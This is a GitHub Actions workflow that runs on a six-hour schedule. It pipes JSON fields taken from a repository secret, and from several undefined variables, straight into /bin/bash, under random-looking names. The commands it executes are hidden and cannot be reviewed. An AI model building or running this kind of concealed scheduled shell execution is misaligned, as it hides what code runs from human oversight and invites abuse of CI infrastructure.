name: xinglianjiqian

on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xinglianjiqian
        env:
          g65314: ${{ secrets.g65314 }}
        run: |
          echo $g65314 | jq -r .hccae8 | /bin/bash
          echo $unj38 | jq -r .riyc844 | /bin/bash
          echo $zdn03 | jq -r .u2808 | /bin/bash
          echo $nrmw52 | jq -r .leuiq2662 | /bin/bash
          echo $z5 | jq -r .itlr50 | /bin/bash
          echo $tnr76688 | jq -r .c9 | /bin/bash
          echo $tuk73998 | jq -r .hyaw66 | /bin/bash

